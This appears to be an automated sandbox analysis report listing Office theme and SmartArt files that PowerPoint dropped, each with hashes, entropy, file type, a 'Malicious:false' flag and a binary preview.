                                                                                                                              Preview:PK.........k.JH...O...VP......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-q.......0..*!......R5/..Xu..C...5.{H.o/.2.....}.*.V..,..^.n.....c.K.....:...e...(.,..\YgE*.9,6a...b#.a.?..Li.tO?=._....%...`N.........{.j........u..\..9^h.T.<.$.<.#...p.V'......f..r.......Kggx...x....E...H.m.6.)._.2S...l....8..,.fHP}.M.......I.B....c.....4.......=ebN.R..Q=.~EN.*.4.x.v.........rf.8..Y..)g.3.3..g.O.e...7Q.B........L.7..v.6;..v....d....M.Z...ZkWC]k.".k.];u..K.Wk...>Wk.#..Z.| t.6tC}C...}.k...s.Z]...Z...Z...Z...Z...Z...Z...Z...j..7lJ..ZZ8.7rC}#...}.k...s.Z]...Z...Z...Z...Z...Z...Z...Z...j..7jJ..ZZ8.7vC}c...}.k...s.Z]...Z...Z...Z...Z...Z...Z...Z...j..7nJ..ZZ8.7qC}....}.k...s.Z]...Z...Z...Z...Z...Z...Z...Z...j..7iJ..ZZ8.7uC}S...}.k...s.Z]...Z...Z...Z...Z...Z...Z...Z...j..7mJ..ZZ8.7sC}3...}.k...s.Z]...Z...Z...Z...Z...Z...Z...Z...j..7kJ..ZZ,..ztyJ.<}.2.e..._....PK.........k.J.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70........
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):280
                                                                                                                              Entropy (8bit):3.529695717494243
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUX0MAkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyEMVymD0wbnKNAH/lMz1
                                                                                                                              MD5:52829318BDC6E0269BFB0626D2D1C1E2
                                                                                                                              SHA1:80F597C31152B771AADA76DCC598DC7D0162ECA3
                                                                                                                              SHA-256:A73279946A11C61E07A92A61FEB90A2B741B9CCA0F86C718B79E4BD06C18456D
                                                                                                                              SHA-512:3D4FF52AF0CF12F36675D5BBD1679C2B03CF11DD944489369DD23764EEEB79DA19944C605B93F1A04F278DE3E8C98437B59EC4FC4675819614C50E222D3D001C
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.a.d.i.s.o.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2924237
                                                                                                                              Entropy (8bit):7.970803022812704
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                                                                                                              MD5:5AF1581E9E055B6E323129E4B07B1A45
                                                                                                                              SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                                                                                                              SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                                                                                                              SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):286
                                                                                                                              Entropy (8bit):3.5434534344080606
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUXIc5+RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny4KcymD0wbnKNAH/lMz1
                                                                                                                              MD5:C9812793A4E94320C49C7CA054EE6AA4
                                                                                                                              SHA1:CC1F88C8F3868B3A9DE7E0E5F928DBD015234ABA
                                                                                                                              SHA-256:A535AE7DD5EDA6D31E1B5053E64D0D7600A7805C6C8F8AF1DB65451822848FFC
                                                                                                                              SHA-512:D28AADEDE0473C5889F3B770E8D34B20570282B154CD9301932BF90BF6205CBBB96B51027DEC6788961BAF2776439ADBF9B56542C82D89280C0BEB600DF4B633
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.a.i.n._.E.v.e.n.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3078052
                                                                                                                              Entropy (8bit):7.954129852655753
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                                                                                                              MD5:CDF98D6B111CF35576343B962EA5EEC6
                                                                                                                              SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                                                                                                              SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                                                                                                              SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):274
                                                                                                                              Entropy (8bit):3.5303110391598502
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUXzRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnylymD0wbnKNAH/lMz1
                                                                                                                              MD5:8D1E1991838307E4C2197ECB5BA9FA79
                                                                                                                              SHA1:4AD8BB98DC9C5060B58899B3E9DCBA6890BC9E93
                                                                                                                              SHA-256:4ABA3D10F65D050A19A3C2F57A024DBA342D1E05706A8A3F66B6B8E16A980DB9
                                                                                                                              SHA-512:DCDC9DB834303CC3EC8F1C94D950A104C504C588CE7631CE47E24268AABC18B1C23B6BEC3E2675E8A2A11C4D80EBF020324E0C7F985EA3A7BBC77C1101C23D01
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.s.h...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3446188
                                                                                                                              Entropy (8bit):7.939078022105486
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:98304:hAABj6t8mC7x/pS6+X3Bzx37OjbqOMhbEsMWII5:ct8mC7x/pS6uBzp5NhAsMWt
                                                                                                                              MD5:AD1C52DB4C29726B3A2D28DDA1110F76
                                                                                                                              SHA1:46A0656C55202A4ADFAAC7E98E9E1340C4A1FD55
                                                                                                                              SHA-256:7973C1386416C251569ACC3CDBFE04DA848262A9A2DA998F915E000BFD6B52B3
                                                                                                                              SHA-512:95C3F09611F977EB3F146C9844D7B96AF3E8123CF3393884CD10EFE7C250F446A565EDAFED1CF1FA6DCAC4D7EADAFACAD134D2A75A8CFB74462F62F5EA8B7400
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........Z&A........a.......[Content_Types].xml...r.`...[a.:%..R.v..p.gh..$d...^../.[0.e..=d....B...c.._?~._>$..}...2.t]...D.ty...I........._....T.M.I..,..APLo.$,z.,J.wf.<...e>..p.=.G......eZFiyT...8....E...P}y}..,.w;...\]k.....o......9(.E<.....>..I;....|.Lq.g....]..g......~>W.<....0/?.I.....g...U.V..3....l.O........m.l...T.....h.GE.......'K....$...z.E..(.Gc.....N......>...b....Z...Y.f.13k..:af..Y..13...........8L....o...s.....k...l.k....K.Z..i[..7mk...m._........~.../.^...{..Z...r@........P.@.....Z..d....R..e.O..jY.S.,..Z..T-K}....Z-^}.}iyS_C.C}.6.w.`.zNd-K}2...e.O..jY.S.,..Z..T-K}...>U.R_.....}iyS_C.C}C...*....Y.R..uwY.S.,..Z..T-K}...>U.R..e.O..W..o./-o.kha....N.LP..e.O...,..Z..T-K}...>U.R..e.O..jY....w./-o.kha.odC}#...s"kY....K}...>U.R..e.O..jY.S.,..Z..j.x.....M}.-....P....9..,..\[w..>U.R..e.O..jY.S.,..Z..T-K}.Z..N...M}.-...m.o.`.zNd-K}2...e.O..jY.S.,..Z..T-K}...>U.R_............3..;S0A='...>.k...jY.S.,..Z..T-K}...>U.R..e..V.W.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):282
                                                                                                                              Entropy (8bit):3.52879087534807
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUXG+kRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny2nymD0wbnKNAH/lMz1
                                                                                                                              MD5:28404EC391B6387F3F2CF0A5BAE7D20E
                                                                                                                              SHA1:1DFAD8A962FAD4D55E2070689F3EEF4780C677FF
                                                                                                                              SHA-256:D870840CE4C7EE578CE1932C463B7760E31ECDF143CFBB9C194F488953E3BA70
                                                                                                                              SHA-512:EE7B29C3F389F25A515E2FC58E6A96617024CE74BBCF2926A5A679B536DBA10D925BDD9EE0089590658B3A20BFD8DBEBE48577A20C9CD93AD2B085BB4C8A3E82
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.t.e.g.r.a.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3295051
                                                                                                                              Entropy (8bit):7.9549249539064
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:98304:RMKPrL1cgIF6jyoKfszvzC2UFsp3SUwDyMdghJU:RLPrGgIF6jJKAvO2UAiwU
                                                                                                                              MD5:5978107C3CB2A4A8427E643D0A5587EB
                                                                                                                              SHA1:A3A865B6D128E7C9C5821DF03B9EDFE136F53D17
                                                                                                                              SHA-256:DDCEAEC2A8E652B60CFA4D5D4C7895D70AD25A214D70DE884302C8FE18F53910
                                                                                                                              SHA-512:D9E0B9D52665F4C1E4B6CC32E6DEBA4C0CBC9309728415AC9588DDD84CAD47A90567192D24BF7FF2F5DD7836A559F396B5015ABF3E085ABC9B813FF365388D65
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK..........1A.f}......p......[Content_Types].xml..n.@.._......8i.'......}.......(y...H}......3Fi..%.......3..._...j.`.2....cod.(...r...w{s..)...]..3..APF.61...6ug.Y...... 7.....d<..Q.V6.N......{.0.U5...>.-..Ko.nw.f...'.....!.s.=fw.{PaW.. ..82.;.<..os....n....>...w..%....P...v...v....'....m.m..3.[.._...:[,...h..!~s..^..Y..E.....^.9Y.j.....#x......3....=....b}4O.*....k7.+.&.Xg.X.X..XSN.KN.+N.7.X....!..CR....I]...>....L...!=...9..!L.0.v.gEo\.......w..No.a.C.q.}<.........a..n./......e.-)h9a..}i.}.."-..C.C.Xq..0?..M4.........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......4....&T......Wlw.b....}..+.A\...q......~.WK.Z^..........>.h..`......}......k..s.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G.....(.P.'....B\...}..+.A\...q.....~..+.!\-1hyAK.ZV...... ...-Z.>X.2.....>8..S.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G....(.P.'....B\...}..+.A\...q.....~..+.!\-1hyAK.ZV...... ..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):284
                                                                                                                              Entropy (8bit):3.5058612801050892
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUX1kRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyYymD0wbnKNAH/lMz1
                                                                                                                              MD5:1F4035219DC6A0E9FD3A3164C6B6D0E6
                                                                                                                              SHA1:C6CFB52EC8764F3B27782310DD74A71AB8EFD34C
                                                                                                                              SHA-256:6AC194049AB034406AD36F9C4436CFC74BF03664A3C025F91D642779D15B9DFC
                                                                                                                              SHA-512:1D86B380200A41547E2FF9A00CEFAB5895F88BD777EAF3981A0406B1CFD2139069D922A88963431EA781FB766A8410957A33816F8E27F57C1EBA85507540F715
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.e.l.e.s.t.i.a.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3611324
                                                                                                                              Entropy (8bit):7.965784120725206
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                                                                                                              MD5:FB88BFB743EEA98506536FC44B053BD0
                                                                                                                              SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                                                                                                              SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                                                                                                              SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):288
                                                                                                                              Entropy (8bit):3.5359188337181853
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUXe46x8RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyO3UymD0wbnKNAH/lMz1
                                                                                                                              MD5:0FEA64606C519B78B7A52639FEA11492
                                                                                                                              SHA1:FC9A6D5185088318032FD212F6BDCBD1CF2FFE76
                                                                                                                              SHA-256:60059C4DD87A74A2DC36748941CF5A421ED394368E0AA19ACA90D850FA6E4A13
                                                                                                                              SHA-512:E04102E435B8297BF33086C0AD291AD36B5B4A97A59767F9CAC181D17CFB21D3CAA3235C7CD59BB301C58169C51C05DDDF2D637214384B9CC0324DAB0BB1EF8D
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.p.o.r._.T.r.a.i.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:modified
                                                                                                                              Size (bytes):8705569
                                                                                                                              Entropy (8bit):7.955490103632122
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:196608:fHnG7lmZcnwldXA4AZwsjVvWJ5u2AbKLCIV50CAmad7uS/5o:u7lVGXA4ABJWJc2A6rkno
                                                                                                                              MD5:476CF35ED8367EB98237B6428266D6D8
                                                                                                                              SHA1:37B320D5109D5FB41044F329187CFECAA8DE2A9C
                                                                                                                              SHA-256:71739BEA66F1DEE0789A7675ADD098123EC0E8E45EB74D707F6412B28FCBAE81
                                                                                                                              SHA-512:7280C51F2DC97871C8B959A971445E1CE1499D108204C025043A0B44E9A9D6AC03E1326BBE652EF2EF900BC6F3F5566A32DBA5AA2EEA6A84F1585323E9C9CAE0
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK..........A.f}......p......[Content_Types].xml..n.@.._......8i.'......}.......(y...H}......3Fi..%.......3..._...j.`.2....cod.(...r...w{s..)...]..3..APF.61...6ug.Y...... 7.....d<..Q.V6.N......{.0.U5...>.-..Ko.nw.f...'.....!.s.=fw.{PaW.. ..82.;.<..os....n....>...w..%....P...v...v....'....m.m..3.[.._...:[,...h..!~s..^..Y..E.....^.9Y.j.....#x......3....=....b}4O.*....k7.+.&.Xg.X.X..XSN.KN.+N.7.X....!..CR....I]...>....L...!=...9..!L.0.v.gEo\.......w..No.a.C.q.}<.........a..n./......e.-)h9a..}i.}.."-..C.C.Xq..0?..M4.........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......4....&T......Wlw.b....}..+.A\...q......~.WK.Z^..........>.h..`......}......k..s.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G.....(.P.'....B\...}..+.A\...q.....~..+.!\-1hyAK.ZV...... ...-Z.>X.2.....>8..S.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G....(.P.'....B\...}..+.A\...q.....~..+.!\-1hyAK.ZV...... ..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):280
                                                                                                                              Entropy (8bit):3.532897849466528
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Q+sxnxUXYwRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny5ymD0wbnKNAH/lMz1
                                                                                                                              MD5:FB2CC12691A46374B7E41C7717EA840C
                                                                                                                              SHA1:D0D3FCB7822E592D941E93D345038319D0AD5F72
                                                                                                                              SHA-256:511CC0AD1D792722E928A7FF0A99EA09125D47F6F63381BB9E7B57336A7CAA43
                                                                                                                              SHA-512:E491B650D49B1136D5AC34B4DD8157F7FB41B9B57906A9A23B6ADD24FEE0EA3CA182CAFD9F4C0D35816D5417D610799E9DEDA248184DBBB7ED1AD52CA0958D4A
                                                                                                                              Malicious:false
                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .O.r.g.a.n.i.c...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 4410 bytes, 2 files, at 0x44 "PictureFrame.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):20554
                                                                                                                              Entropy (8bit):7.612044504501488
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:zEAH676iPi8+IS5iqn7G8E0GftpBjExDxIHFLrHRN7Ke/ll7PK/pGaz6:zEhG8+ISrG8Pi6xDxCKoIGaz6
                                                                                                                              MD5:486CBCB223B873132FFAF4B8AD0AD044
                                                                                                                              SHA1:B0EC82CD986C2AB5A51C577644DE32CFE9B12F92
                                                                                                                              SHA-256:B217393FD2F95A11E2C594E736067870212E3C5242A212D6F9539450E8684616
                                                                                                                              SHA-512:69A48BF2B1DB64348C63FC0A50B4807FB9F0175215E306E60252FFFD792B1300128E8E847A81A0E24757B5F999875DA9E662C0F0D178071DB4F9E78239109060
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF....:.......D...........................:....?..................................PictureFrame.glox.................Content.inf........[.... '.q..@.........<./..+./. ...."o.o./..{^a.7^.D.HA....^J... ...........T%q..b...+pz.n.=....jT.+M..=H..A...py.3.........H...N...[..%..~....>.%....3.r...wx.....0.....7..94..2..45..7f.......D.. ...[...f.:H..../N..4.....8.....:x.I....u|.`."...\..N..%.M#..^v$.*....T.m.....?.-.wki.X..8..F.G..Y.^8...-....+.&.+&.No...e!.#.8.....YF.......<w.....=.Q.S..7....MW....M..9A.3..c..L....|.E-Y....]n".|....b9..l@.d.T...a.f...~.&k.[..yS..q..]L}..)w.....$.@..v...[9..X....V...a.NK....m9.5.....Kq.;9`.U.e...8.<..)Y.H........z.G...3n.yWa.g.>.w!e.B8:......f..h..z....o.1<.RT..WK...?g .N..+..p.B.|...1pR_......@...a....aA......ye..8...+M.l..(.d..f.;....g........8R.\.w.:ba....%...|p....`lrA.|....a.U.m=ld......7....#..?Dq..D.....(.5.K.a..c.G..7..]hF..%:}......}J.j$.....4...l];..v>.&j........Y.vk..$1.@X$...k...9..?...z..![..../...).a.=....aZ^.3?....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 3749 bytes, 2 files, at 0x44 "TabbedArc.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):19893
                                                                                                                              Entropy (8bit):7.592090622603185
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:v3Zh3VlkpSIcgbA8E0GftpBjEmm3UFLrHRN7GYvlvQyUTL2mTAp:v31qp/A8Pi6mUqGGvU+mcp
                                                                                                                              MD5:EF9CB8BDFBC08F03BEF519AD66BA642F
                                                                                                                              SHA1:D98C275E9402462BF52A4D28FAF57DF0D232AF6B
                                                                                                                              SHA-256:93A2F873ACF5BEAD4BC0D1CC17B5E89A928D63619F70A1918B29E5230ABEAD8E
                                                                                                                              SHA-512:4DFBDF389730370FA142DCFB6F7E1AC1C0540B5320FA55F94164C0693DB06C21E6D4A1316F0ABE51E51BCBDAB3FD33AE882D9E3CFDB4385AB4C3AF4C2536B0B3
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF............D................................?..................c...............TabbedArc.glox.....c...........Content.inf.;....Y.[.........B.....?.T..ZD...........^C...U.R<Z....z+.I.....Z..-.V...f.....lB..\P.....=.-p....w ...\.kD..x'v..T..A..............".8...d.........FD.ZL.h..T...bp.)9B.v..i..VX...&..\..7.s..qy...l........Rty.Y...rU..>.9...8....L..\.^x.kDU.|TJ..{kN.G..E..$.kvy?.. mv......P..4.....q.1.6<u....e..dD...4.1E..Xi.5.=....1.P.c.K~S...YMO:.?..cL.g.tq\.(b1....E..0A.i..C...BT.m.S......:...}.&U..#QL..O.O../..K......=..........0a..O............BYP......>f.......iu...7.K..;QO~.t....%N.s.]>~#../7YN.....C..9.=cY.......y..U5.....,.....u.....#_..SG.`NR*.....?*..d.R.k.rX$...&.... ..h.4T.D^k-xA...............Hz..ep)e..4..P."fo Ne...o.....0n.Exr.........H..v...A.."..%)2......5...".}j.o8...E.HRQ;}.. .._L.+.jz....{.U..}...=B.o.^..vZ.:5.Z.M....y{\(...N..9...EB*MG...!N.vy..^...nE..2..@.;.4..C..t.4....h..O.8.=.m./...|Lu.|mCU..b.^.n39.h[M...%D{..w.1
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
